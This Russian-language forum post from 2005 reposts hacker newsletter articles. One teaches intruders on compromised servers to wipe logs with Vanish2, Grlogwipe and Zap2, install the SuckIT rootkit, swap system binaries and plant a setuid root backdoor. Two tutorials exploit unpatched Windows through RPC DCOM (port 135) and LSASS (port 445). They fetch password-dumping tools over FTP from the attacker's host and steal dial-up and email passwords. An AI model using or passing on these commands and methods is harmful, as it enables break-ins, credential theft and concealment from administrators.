Форум АНТИЧАТ - musthave.ru спасибо вам, и мне грустно...

Вот перебирал свои сд диски и нашёл на одном из них:

Автор

decoder

D&D TeaM

Зарегистрирован: 10.10.2004
Сообщения: 491

Цитата:

Добавлено: Ср Фев 09, 2005 8:09 pm

Заголовок сообщения: Заметаем следы

0.Got root? Save root!
=====================
Итак, теперь ты стал настоящим кулхацкером... Рутишь все подряд, биндишь шеллы ,ставишь соксы, расшифровываешь на удаленых тачках SSH-ключи и т.д. Но вот незадача... Приходит "бдительный админ", смотрит логи и... с довольной улыбкой (еще бы! хакиря обнаружил!) рубит весь твой, накопленный долгим трудом, контент. Я сам потерял ни один порутаный сервак, пока вплотную не занялся "сохранением" полученного рута... Итак, ща мы с тобой конкретно зашифруемся... Поехали!

1. Выбор логклинера
====================
Vanish2
Наверно уже не раз ставил такую задачу? Уже создано много всего, что же выбрать? Вообще-то, у каждой ОСи свои характерные причуды и особенности. Наверно, никогда нельзя спутать Соляру и Линуху. Ну а отсюда и разные типы логинирования.
Для линухи лучше всего использовать Vanish2(ссылка на ванишЪ). Во первых ваниш зачищает весь твой лог с самого твоего появления на серве. Хотя если ты достаточно долго тусишь на серве - чистка затянется на долгие минуты. На самом деле ваниш - идеальный выбор для "маленьких" серверов, где админы не особо копаются в логах. Для особых случаев (например если ты порутал valuehost ) я опишу другой метод.
Ставится ванишЪ довольно просто. Makefile разработчикам, видно, было делать впадлу. Поэтому компилим командой gcc (например так: gcc vanish.c -o vanish). В использовании ваниш так же просто... Достаточно ввести свой логин uid и gid и тулза сама отыщет и удалит оставленные тобой следы (./vanish xakep 0 0)

Grlogwipe
Ну кроме линух есть и другие ОСи. Например БЗД, на которых ваниш категорически отказывается ставится. В этом случае идеальный выбор - межплатформенный клинер Grlogwipe(ссылка на Grlogwipe) Этот клинер гораздо быстрее ваниша, но и более сложный в использовании. Обладает множеством функций, полный список сможешь лицезреть, если наберешь в консоли ./grlogwipe -h. В установке он довольно прост, хотя так же как и ваниш не имеет Make-файла. Устанавливается командой gcc -O6 -Wall -o grlogwipe grlogwipe.c ... Про использование клинера - смотри хелп.

Zap2
Так же стоит отметить отдельный клинер для SunOS Zap2 (ссылка на Zap2). Так как в солярке немного другой вид логинирования - то стандартные Vanish и Grlogwipe там не покатят. В использовании клинер очень прост.. Стоит отметить его малый размер и скорость чистки...

2. Выбор руткита
================
Теперь перейдем к руткитам. Здесь тебе стоит выбрать самому. Лично я руткитами пользуюсь редко. А если и пользуюсь, то только SuckIT'ом... (ссылка на сакит) Дело в том что практически все руткаиты палятся любым антивирем и чекруткитом. Другая опасность состоит в том, что некоторые руткиты протроянены самими разработчиками или ушлыми распростронителями. Например, небезызвестный руткит Shv4 долгое время отсылал разработчику письма с названиями-логинами-пассами портуанных серваков Так же стоит упоминуть о "приватном" рутките Shv5... Его надо искать только в узких кругах.

Так, забыл про установку... Как ты видишь SuckIT состоит из двух частей... собсвенно протрояненго /sbin/init и login(программа клиент, который ты будешь коннектится к порутанной тачке)
Установка так же очень проста. Для начала конфигурируем руткит командой make skconfig, дальше запускаем make и make install... Все. Руткит активирован. А.. забыл.. Тебе еще надо будет открыть какой-нибудь порт, на который впоследсвии и будет коннектится твой login-бекдор. (например в iptables это будет выглядеть так: iptables -I INPUT 1 -p tcp --dport нужный_порт -j ACCEPT )
Дальше запускаем бекдор с флагом -h твой_хост -p открытый_порт... Вот так вот. Я не стану упоминать про другие, менее известные руткиты... Просто кину их в аттач к статье, надешь инфу по ним сам. То ведь дядя Фан страшно ленивый..

3. Если ты порутал microsoft.com
================================
Итак, давай подумаем что делать, если ты портуал более-менее "крутой" сервак. Конечно, на крутых серваках и "крутые" админы с большой зарплатой и не менее большим пузом (тупой стереотип ) Хотя не всегда так... Встречаются настоящие профи своего дела. Им найти твой паблик-руткит или логклинер - раз плюнуть... Поэтому здесь мы будем юзать довольно интересную вещицу - а именно, будем подменять бинарники...
Я не буду вдоваться во все тонкости изменения сорца (полный FAQ сможешь найти на xakep.ru)... Скажу лишь, что все описанное там, я испытал на "своих" серваках... Практически везде работало. Тут я выкладываю уже измененные сорцы, которые тебе и потребуется изменить (приедворительно не забудь сделать бекап исходных)
[ссылка 1]
[ccылка 2]
[ссылка 3]
Подменяем бинарники iptables, netstat и ps... Скоро допишу скрипт который будет скрывать твой uid в /etc/passwd /etc/shadow/, а так же скрипт на вывод команды ls

4. Экстрим
==========
Ну и последний вариант... Например, на серве нет ни одного компилятора... Руткит не поставить... Логвайпер не компилится... Тогда как вариант мы пишем быстренько вот такой бекдор, компилим на своей тачке и заливаем на порутанную:

mail() {
setuid(0);
setgid(0);
system("perl /usr/bin/lc.pl");
system("/bin/bash");
}

Где "perl /usr/bin/lc.pl" -команда к запуску самопально логклиенра на перле... (ссылка на перловый клинер)

5. Happy end
============
Здесь были описаны ДАЛЕКО не все способы остаться незамеченным на порутанной тачке... Надо усвоить, что даже если ты все правильно сделал - не факт что на долго останешься рутом... короче, я думаю у тебя есть над чем поразмыслить, и уж 100% чем дополнить...

==============
written by FaN
icq: 447-136
==============

Прилагаемые файлы:
http:/musthave.ru/files/zap2.c
http:/musthave.ru/files/zap3.c
http:/musthave.ru/files/grlogwipe.tar.tar
http:/musthave.ru/files/logclean.tar.tar
http:/musthave.ru/files/rootkit_source.tar.tar
http:/musthave.ru/files/vanish2.tgz

____________________________________

Присутствия моих двух ников обусловленно тем что под одним из них Liar2 я сижу на работе а основной логин потерять не хочется! посему прошу не банить !!!

номер 2 из расылки

Цитата:

Hacker's Manifest
This is our world now... the world of the electron and the switch, the beauty of the baud.
We make use of a service already existing without paying for what could be dirt cheep if it wasn't run by profiteering gluttons, and you call us criminals. We explore...and you call us criminals. We exist without skin color, without nationality, without religious bias...and you call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to make us believe it is for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
intro
Привет! Поздравляю тебя с Новым 2005 годом и Рождеством! В нашем новогоднем конкурсе, к сожалению, никто не победил =) Так получилось из-за невнимательности одного из участников и в итоге он "спугнул хакера"(это по сюжетной линии) =) Второе место занял v i r g o z и получил за это от X134FD прикольный семизнак. В общем, проводить конкурс нам понравилось и мы уже подумываем о следующем ;) В нем приз будет уже, скорее всего, денежным. Так что - вливайся! =) В этом выпуске я решил разместить 2 статьи одного нашего достаточно нового юзера - Holod'a. Обсудить их, или задать по ним вопросы ты, как всегда, можешь на форуме MustHave.ru.
Атака на 135 порт
Вот прошел новый год, и уже можно громко закричать, что "НАСТУПИЛИ ЗИМНИИ КАНИКУЛЫ!!!". А что можно сделать то за это время? Ну как всегда, побродить по просторам инета. Что? У тебя нет денег на карту? Ну не расстраивайся мы сейчас что-нибудь придумаем, ведь такая мелочь не сможет испортить нам каникулы, правда?
И так сейчас мы будем отнимать Интернет у более богатых, но менее умных. Ну что? Ключ на старт =)
Как ты уже догадался 135 порт - это уязвимость в RPC DCOM. Которая гремела раньше на весь мир, но и сейчас остались те кто не пропатчил свою тачку.
Для атаки нам понадобится:
1 KAHT2.exe // собственно сам Exploit
2 Dialupass.exe // или другая программка для заимствования паролей.
3 Сайт с доступом по FTP // откуды мы и будем заливать Dialupass..
Понеслась !
Самое главное найти не пропатченную тачку, в этом нам поможет KAHT2 к счастью в него встроен сканер.
Запускаем его таким образом:
С:\test\kaht2.exe 212.91.91.1 212.91.91.255 500
Значение threads, (последняя цифра), можно поставить кому как удобнее, по умолчанию 50.
И если нам везёт, то через некоторое время сканирования, появиться строка типа
C:\Windows\System32>
Появилась? Если да, то можешь прыгать до потолка, пол дела сделано =). Строка означает мы внутри чужой тачки, а это, могу заметить, просто отлично.
Такс, теперь нам осталось залить со своего сайта Dialupass.exe. Енто можно сделать посредствам стандартной утилиты FTP.exe, сделаем это в 2 этапа:
1. Напишем небольшой сценарий в файл
echo user login password>a //логин и пароль от сайта с которого будем всё сливать
echo type binary>>a
echo get PassView.exe>>a //Сливаем PassView.exe
echo get ext.bat>>a // и батник к нему
echo quit>>a //выходим
как ты уже заметил, всё вышеописанное скидывается в файл с именем "a"
2. Запустим FTP
Запускаем FTP командой
ftp -n -s:a ftp.narod.ru
И по прошествию ~1 минуты снова появляется
C:\Windows\System32>
А дальше дело за малым:
C:\Windows\System32>ext.bat
и
C:\Windows\System32>type 1.txt (если содержание ext.bat “Dialupass.exe /stext 1.txt”)
и вот на экране побежали строчки, если там есть логин и пароль (а чаще всего так и бывает) значит, у нас появился халявный Интернет =)

PS:
1 вместо Dialupass, можно использовать PassView.exe v1.5, (а можно вообще Трояна).
2 При желании проги можно заливать со своего компа, а не с сайта.
3 Удобнее (для автоматизации) написать macros.
4 Оригинал статьи находится на www.musthave.ru
5 Все вышеописанное вымысел, все совпадения прошу считать случайными.
lsass или атака на 445 порт
Да, по глазам вижу кому то опять хочется инета на халяву =). Что кахт уже надоел и надо искать новые способы добывания инета ?
Правда! Если в думаться, то на RPC DCOM основан самый разрушительный Интернет червь MSBlast, и юзеры патчат свои тачки не потому, что могут подвергнуться атаки из сети, а из-за противного окошка "Завершение работы системы через 60 секунд". Да и сканировать маленькие IP диапазоны Кахтом как-то не с руки, довольно скучно =(. Ведь правда ?
Другое дело lsass. Ещё куча компов не залатали дыры от неё. И процесс сканирования идет веселее =)
Ну приспупим-сссс =)
Нам понадобится:
1 DSScan v1.00 //Ента прога ищет бажные тачки.
2 LSA Service Exploit //новая версия Эксплойта для Lsass.
3 RPC GUI v2 //а вернее только FTP Server от него (или сайт с доступом по FTP).
4 Программа утягивания паролей (рекомендую PassView.exe).
Поехали =)
Да, да, да опять начинается долгий процесс сканирования, а может и не долгий, как повезёт =). DSScan отличный сканер на уязвимость в lsass, позволяет сканировать хоть весь и-нет. Ну что ждёшь? Запускай его =)
И там уже автоматически вставлен твой IP диапазон, Ты ведь это тоже заметил, Индеец Зоркий Глаз? Но такая маленькая область сканирования нас не удовлетворяет =( , поэтому ставим какую нам надо. Поставили ? Хорошо =) , добавляем его в список клавишей с надписью "->", и нажимаем кнопку очень похожую на Play в моём проигрывателе =).
Начинается процесс сканирования и в большом поле, стали появляться компьютеры которые находятся в сети. Но не надо преждевременно радоваться если в графе статус написано "Not vulnerable", это значит , что тачка пропатченна =( ,ну а если написано "VULNERABLE", то можно прыгать до потолка - и-нет почти у нас в кармане =). Найдя потенциальную жертву запускаем lsa.exe, вводим IP и порт, и конечно жмем кнопку начать.
Через некоторое время мы видим:
C:\windows\system32>
ОК всё идет по плану =), запускаем RPC GUI v2, и во вкладке FTP Server давим Start.
Теперь в ранее открывшийся консоли даем команды:
C:\windows\system32>FTP /запускаем стандартный FTP клиент
open 212.xx.xx.xxx //наш IP
user <212.xx.xx.xxx:<none>>:asdf //asdf - логин по умолчанию
//все ! теперь мы подцепили чужой компьютер к своему
get /test/passv.exe //заливаем файл из папки C:\test
get /test/export.bat //тоже самое =)
!export.bat //запускаем export.bat на удалённой тачке
put export.txt //забираем награбленное =)

В файле export.txt, должны быть все пароли, которые добыла нам программка passv.exe (PassView.exe). Необходимо только, чтобы файрвол разрешал входящие подключения, а то можно до бесконечности ждать пока появиться строка "user <212.xx.xx.xxx:<none>>:"
Не нравиться качать файлы со своего компа? Просто заливаем их на сайт с доступом по FTP, и качаем оттуда. Меня полностью удовлетворяют сайты на www.narod.ru (даже если Трояны хранить доступ закрывают только через месяц =)), также некоторые пользуются Newmail'ом, вроде тоже нечего.
Что ? У чела есть красивое мыло, и тебе ОЙ как нужно знать пароль от него, проверяем стоит ли The BAT!, а он скорее всего стоит =), ищем файлы аккаунта, сливаем его себе и прогой «The Bat! UnPass» (tbup.exe) вытягиваем пароли. Вот и всё. =)

PS

1 Тут тоже приходят на помощь макросы =)
2 Что бы избежать повторения Я не стал писать, как сливать файлы с сайта по FTP (про это можно почитать в статье "Атака на 135 порт")
3 Файл аккаунта The BAT! чаще всего храниться тут: "<путь к папке с The Bat!>\MAIL\<название ящика>\ACCOUNT.CFG"
4 В данной статье Я рассказал всего лишь главные принципы, а дальше у кого на что фантазии хватит =).
5 Оригинал статьи находится на www.musthave.ru
6 Так же рекомендую прочитать статью "Атака на 135 порт" (тоже лежит на www.musthave.ru)
7 Все вышеописанное вымысел, все совпадения прошу считать случайными.
8 Прошу простить меня за возможные ашыпки и неточности в описании.
Credits, Announcements & Warnings!
Наши статьи можно прочитать и обсудить на форуме MustHave.ru.
Задать свои вопросы вы можете и на нашем канале: irc.dalnet.ru #young-hack
Пожелания и предложения относительно рассылки прошу слать на: decoder[at]musthave.ru

Также хочу анонсировать e-zine "MustHave.ru", первый выпуск которого можно будет скачать с нашего сайта уже на днях. Он будет содержать все статьи наших пользователей, которые размещены на форуме.

Внимание! Статьи данной рассылки разрешается публиковать в других источниках исключительно с согласия автора и с размещением ссылки на ресурс MustHave.ru

Выпуск подготовил: decoder
Дизайн рассылки: decoder

Напоминаем! Все материалы рассылки и форума только для ознакомления! За их осмысление и использование в других целях Администрация проекта MustHave.ru, авторы, администрация сервисов, по средством которых данные материалы распространяются, ответственности не несут.